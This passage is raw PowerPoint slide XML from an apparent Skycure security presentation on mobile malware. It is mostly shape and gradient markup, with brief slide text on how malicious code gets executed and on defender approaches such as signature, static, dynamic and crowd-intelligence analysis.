                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1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Freeform 65"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2960628" y="3197416"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24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24799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="24102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w="139700" prst="cross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Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3194770" y="3941265"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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Rounded Rectangle 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3235719" y="4159332"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="0"/>
            </a:effectLst>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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ounded Rectangle 68"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3256981" y="4215675"/>
              <a:ext cx="216458" cy="260072"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 26999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 extrusionH="76200" contourW="12700">
              <a:bevelT w="50800" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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0" name="Picture 6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66051" y="1468555"/>
              <a:ext cx="2198318" cy="227805"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="Straight Arrow Connector 70"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3928352" y="3506201"/>
            <a:ext cx="28332" cy="1011168"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4141757" y="3569274"/>
            <a:ext cx="10576" cy="970816"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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3" name="Line Callout 1 (Border and Accent Bar) 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719769" y="4876915"/>
            <a:ext cx="1213611" cy="631663"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val 108009"/>
              <a:gd name="adj3" fmla="val -151244"/>
              <a:gd name="adj4" fmla="val 172254"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8CBDE7"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="8CBDE7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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Naive code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>returned</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Line Callout 1 (Border and Accent Bar) 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033405" y="2360482"/>
            <a:ext cx="1213611" cy="631663"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 61327"/>
              <a:gd name="adj2" fmla="val 109117"/>
              <a:gd name="adj3" fmla="val 165830"/>
              <a:gd name="adj4" fmla="val 151943"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8CBDE7"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="8CBDE7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Get code to execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Arrow Connector 74"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4335370" y="3560193"/>
            <a:ext cx="611276" cy="772276"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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>
            <a:off x="4523609" y="3479307"/>
            <a:ext cx="708829" cy="817156"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4692364" y="3157299"/>
            <a:ext cx="1776054" cy="907833"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4748466" y="2950749"/>
            <a:ext cx="1736857" cy="867080"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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9" name="Line Callout 1 (Border and Accent Bar) 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3409748" y="5795443"/>
            <a:ext cx="1213611" cy="631663"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val -851"/>
              <a:gd name="adj2" fmla="val 57818"/>
              <a:gd name="adj3" fmla="val -209617"/>
              <a:gd name="adj4" fmla="val 60561"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="C0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 anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Line Callout 1 (Border and Accent Bar) 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4988421" y="5551026"/>
            <a:ext cx="1213611" cy="631663"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val -851"/>
              <a:gd name="adj2" fmla="val 50068"/>
              <a:gd name="adj3" fmla="val -210444"/>
              <a:gd name="adj4" fmla="val 17076"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="C0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 anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Line Callout 1 (Border and Accent Bar) 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6518277" y="4360034"/>
            <a:ext cx="1213611" cy="631663"/>
          </a:xfrm>
          <a:prstGeom prst="accentBorderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3285"/>
              <a:gd name="adj2" fmla="val 92261"/>
              <a:gd name="adj3" fmla="val -86363"/>
              <a:gd name="adj4" fmla="val -3590"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="C0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 anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious code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72537" y="2289989"/>
            <a:ext cx="1439997" cy="1079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175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  <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="73" grpId="0" animBg="1"/>
      <p:bldP spid="74" grpId="0" animBg="1"/>
      <p:bldP spid="79" grpId="0" animBg="1"/>
      <p:bldP spid="80" grpId="0" animBg="1"/>
      <p:bldP spid="8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 What Can Defenders Do?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Change the paradigm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyzing an app by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>itself is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Utilize analysis of similar apps on other devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Crowd-wisdom intelligence:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compare app traits to all millions of apps that have been seen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ability to track legitimate app behaviors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ability to track malicious app behaviors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1540053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Apply What You Have Learned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Utilize a combined approach to fight mobile malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signature-based analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crowd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>intelligence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware is only one element </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of mobile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>threat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>landscape</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mobile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hreat Defense solution should address all threats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961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Q&amp;A And Next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4713" y="1755703"/>
            <a:ext cx="6415287" cy="3770263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:sp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dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>contact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>skycure.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.skycure.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>blog.skycure.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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 smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://maps.skycure.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>YairAmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SkycureSecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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dirty="0" smtClean="0"/>
              <a:t>/Skycure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="703283" y="3155684"/>
            <a:ext cx="398926" cy="397301"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1845 w 1846"/>
              <a:gd name="T1" fmla="*/ 1397 h 1718"/>
              <a:gd name="T2" fmla="*/ 1837 w 1846"/>
              <a:gd name="T3" fmla="*/ 1460 h 1718"/>
              <a:gd name="T4" fmla="*/ 1789 w 1846"/>
              <a:gd name="T5" fmla="*/ 1571 h 1718"/>
              <a:gd name="T6" fmla="*/ 1747 w 1846"/>
              <a:gd name="T7" fmla="*/ 1619 h 1718"/>
              <a:gd name="T8" fmla="*/ 1629 w 1846"/>
              <a:gd name="T9" fmla="*/ 1696 h 1718"/>
              <a:gd name="T10" fmla="*/ 1498 w 1846"/>
              <a:gd name="T11" fmla="*/ 1717 h 1718"/>
              <a:gd name="T12" fmla="*/ 347 w 1846"/>
              <a:gd name="T13" fmla="*/ 1717 h 1718"/>
              <a:gd name="T14" fmla="*/ 216 w 1846"/>
              <a:gd name="T15" fmla="*/ 1696 h 1718"/>
              <a:gd name="T16" fmla="*/ 98 w 1846"/>
              <a:gd name="T17" fmla="*/ 1619 h 1718"/>
              <a:gd name="T18" fmla="*/ 56 w 1846"/>
              <a:gd name="T19" fmla="*/ 1571 h 1718"/>
              <a:gd name="T20" fmla="*/ 7 w 1846"/>
              <a:gd name="T21" fmla="*/ 1460 h 1718"/>
              <a:gd name="T22" fmla="*/ 0 w 1846"/>
              <a:gd name="T23" fmla="*/ 320 h 1718"/>
              <a:gd name="T24" fmla="*/ 7 w 1846"/>
              <a:gd name="T25" fmla="*/ 257 h 1718"/>
              <a:gd name="T26" fmla="*/ 56 w 1846"/>
              <a:gd name="T27" fmla="*/ 146 h 1718"/>
              <a:gd name="T28" fmla="*/ 98 w 1846"/>
              <a:gd name="T29" fmla="*/ 98 h 1718"/>
              <a:gd name="T30" fmla="*/ 216 w 1846"/>
              <a:gd name="T31" fmla="*/ 21 h 1718"/>
              <a:gd name="T32" fmla="*/ 347 w 1846"/>
              <a:gd name="T33" fmla="*/ 0 h 1718"/>
              <a:gd name="T34" fmla="*/ 1498 w 1846"/>
              <a:gd name="T35" fmla="*/ 0 h 1718"/>
              <a:gd name="T36" fmla="*/ 1629 w 1846"/>
              <a:gd name="T37" fmla="*/ 21 h 1718"/>
              <a:gd name="T38" fmla="*/ 1747 w 1846"/>
              <a:gd name="T39" fmla="*/ 98 h 1718"/>
              <a:gd name="T40" fmla="*/ 1789 w 1846"/>
              <a:gd name="T41" fmla="*/ 146 h 1718"/>
              <a:gd name="T42" fmla="*/ 1837 w 1846"/>
              <a:gd name="T43" fmla="*/ 257 h 1718"/>
              <a:gd name="T44" fmla="*/ 652 w 1846"/>
              <a:gd name="T45" fmla="*/ 1432 h 1718"/>
              <a:gd name="T46" fmla="*/ 964 w 1846"/>
              <a:gd name="T47" fmla="*/ 501 h 1718"/>
              <a:gd name="T48" fmla="*/ 305 w 1846"/>
              <a:gd name="T49" fmla="*/ 1432 h 1718"/>
              <a:gd name="T50" fmla="*/ 486 w 1846"/>
              <a:gd name="T51" fmla="*/ 1098 h 1718"/>
              <a:gd name="T52" fmla="*/ 604 w 1846"/>
              <a:gd name="T53" fmla="*/ 1321 h 1718"/>
              <a:gd name="T54" fmla="*/ 541 w 1846"/>
              <a:gd name="T55" fmla="*/ 1216 h 1718"/>
              <a:gd name="T56" fmla="*/ 423 w 1846"/>
              <a:gd name="T57" fmla="*/ 1153 h 1718"/>
              <a:gd name="T58" fmla="*/ 985 w 1846"/>
              <a:gd name="T59" fmla="*/ 661 h 1718"/>
              <a:gd name="T60" fmla="*/ 992 w 1846"/>
              <a:gd name="T61" fmla="*/ 668 h 1718"/>
              <a:gd name="T62" fmla="*/ 978 w 1846"/>
              <a:gd name="T63" fmla="*/ 696 h 1718"/>
              <a:gd name="T64" fmla="*/ 631 w 1846"/>
              <a:gd name="T65" fmla="*/ 1021 h 1718"/>
              <a:gd name="T66" fmla="*/ 604 w 1846"/>
              <a:gd name="T67" fmla="*/ 1028 h 1718"/>
              <a:gd name="T68" fmla="*/ 590 w 1846"/>
              <a:gd name="T69" fmla="*/ 1021 h 1718"/>
              <a:gd name="T70" fmla="*/ 583 w 1846"/>
              <a:gd name="T71" fmla="*/ 1007 h 1718"/>
              <a:gd name="T72" fmla="*/ 943 w 1846"/>
              <a:gd name="T73" fmla="*/ 661 h 1718"/>
              <a:gd name="T74" fmla="*/ 964 w 1846"/>
              <a:gd name="T75" fmla="*/ 654 h 1718"/>
              <a:gd name="T76" fmla="*/ 985 w 1846"/>
              <a:gd name="T77" fmla="*/ 661 h 1718"/>
              <a:gd name="T78" fmla="*/ 1498 w 1846"/>
              <a:gd name="T79" fmla="*/ 647 h 1718"/>
              <a:gd name="T80" fmla="*/ 1511 w 1846"/>
              <a:gd name="T81" fmla="*/ 633 h 1718"/>
              <a:gd name="T82" fmla="*/ 1526 w 1846"/>
